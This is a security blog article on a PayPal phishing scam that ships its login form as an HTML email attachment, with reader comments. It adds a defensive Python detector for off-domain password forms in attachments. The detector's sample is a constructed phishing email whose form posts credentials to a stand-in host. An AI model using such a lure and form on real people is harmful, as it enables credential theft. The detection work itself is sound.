Regular readers are familiar with our ongoing coverage of phishing attacks.
Recently, we reported on an Apple ID SMS-based phishing scam, and described how tax-related phishing attacks surged by 400 percent this year.
The continued success of these and other phishing campaigns reveals a persistent deficit of security awareness among users. Indeed, as we shared in an article earlier in 2016, Tripwire found that more than half (52 percent) of respondents to a survey conducted at RSA were “not confident” in their ability to spot a phishing attack.
That’s troubling news. And as attacks continue to grow in sophistication, it’ll only get harder to spot a phish.
On Monday, UK malware researcher @dvk01uk came across a PayPal phishing campaign that needs no link at all: the credential-harvesting form arrives as an HTML attachment, and the email tells the recipient to open it on their own computer.
That sidesteps a common anti-phishing check: hovering over a link to confirm that the URL points where you would expect. With no link in the message there is nothing to hover over, and the address the form submits your password to sits in the attachment's markup, where an ordinary user will never look.
Fortunately, users can protect themselves against this phishing technique, though for how long remains to be seen. The malware researcher @dvk01uk expands upon this point in a blog post:
“The only saving grace with this particular phishing attack is that the phishing page is an HTML page / form that they tell you to open on your computer and not a link to a website. The advice we always give to NOT open any attachments to emails and definitely do not fill in HTML form attachments should protect you. But once a phisher puts this onto a website with a plausible & believable URL, then all bets are off and it will be almost impossible to detect the phish. This is very worrying.”
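Because the form is attached rather than linked, the useful signal for a mail gateway or an analyst is the form itself: an HTML attachment containing a password field whose `action` posts somewhere other than the brand it imitates. The script below is an added example written for this article, not code from the researcher or from PayPal. It parses a message with Python's standard `email` and `html.parser` modules, walks the attachments, and reports any form that collects a password and submits it off-domain. The sample message, the `paypal-verify.example.invalid` host and the `TRUSTED_HOSTS` list are constructed for illustration.

```python
"""Flag e-mail attachments that carry a credential-harvesting HTML form.

Added example for illustration; the message and hosts below are constructed.
"""
import email
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts a genuine PayPal login form could legitimately post to (assumption).
TRUSTED_HOSTS = {"paypal.com", "www.paypal.com"}


class FormScanner(HTMLParser):
    """Record every <form> action and whether the form has a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []        # one dict per form: {"action": str, "has_password": bool}
        self._current = None   # form currently being parsed, if any

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)        # attribute values may be None for bare attributes
        if tag == "form":
            self._current = {"action": a.get("action") or "", "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def scan_html(html):
    """Return the list of forms found in an HTML document."""
    scanner = FormScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.forms


def host_of(action):
    """Hostname a form action would submit to ('' for relative targets)."""
    return (urlparse(action).hostname or "").lower()


def suspicious_forms(raw_message):
    """Return (attachment filename, form action) for every off-domain password form.

    Only attachments are inspected: an HTML *body* with a form is a separate
    concern, and the attack described above relies on the attachment route.
    """
    msg = email.message_from_bytes(raw_message, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        filename = part.get_filename() or ""
        is_html = (part.get_content_type() == "text/html"
                   or filename.lower().endswith((".htm", ".html")))
        if not is_html:
            continue
        html = part.get_content()
        if isinstance(html, bytes):            # non-text content type but .html name
            html = html.decode("utf-8", "replace")
        for form in scan_html(html):
            # A relative action (empty host) is treated as off-domain too: a form
            # opened from disk would post to nowhere legitimate.
            if form["has_password"] and host_of(form["action"]) not in TRUSTED_HOSTS:
                findings.append((filename, form["action"]))
    return findings


# Constructed sample: a lure with the login form shipped as an HTML attachment.
SAMPLE_EML = b"""\
From: "PayPal" <service@example.invalid>
To: victim@example.invalid
Subject: Your account has been limited
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="XYZ"

--XYZ
Content-Type: text/plain; charset="us-ascii"

Please open the attached form to restore access to your account.
--XYZ
Content-Type: text/html; name="Restore.html"
Content-Disposition: attachment; filename="Restore.html"

<html><body>
<form method="post" action="https://paypal-verify.example.invalid/collect.php">
Email: <input name="email">
Password: <input type="password" name="pwd">
<input type="submit" value="Log In">
</form>
</body></html>
--XYZ--
"""

if __name__ == "__main__":
    for name, action in suspicious_forms(SAMPLE_EML):
        print(f"suspicious form in attachment {name!r} posts to {action}")
```

The check is deliberately narrow: it does not try to judge whether a page looks like PayPal, only whether an attached form would send a password somewhere PayPal does not own. That is exactly the property hovering over a link would have exposed if the phisher had used a link, which is why the same logic is worth running on attachments. The researcher's warning still stands: once the form is hosted on a plausible URL instead of attached, a gateway rule like this no longer sees it.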
Fortunately, PayPal offers users the ability to enable two-step verification, which will help protect their accounts even if someone compromises their passwords.
Found this article interesting? Follow Graham Cluley on Twitter or Mastodon to read more of the exclusive content we post.
4 comments on “Think hovering your mouse over the URL will save you? Think again!”
I've been using a non-html mail client since 1995.
PayPal are their own worst enemy when it comes to phishing. They proclaim they are anti-phishing but have links on their 'Your … statement is available' emails that look suspicious. I check them out because I'm a security professional but the average person either tires of this process or doesn't know how to begin with. Their users have no confidence that they are safe. Best practice is to give no link at all and get the user to go to a known safe bookmark or type it in from scratch. I've emailed them. Guess how much response I got :-(
Paypal 2FA is not available in all countries! Why not?
I always log in to the site by typing the URL, check the SSL padlock before I log in, and then log in to see a statement or whatever. I have the motto, "If something is running on your computer that is not part of the OS, then you really ought to know what it does and why it is running." Also, "Don't install something because you've been prompted to. Only install stuff you want." That, and MJ Registry Watcher have kept me safe for many years!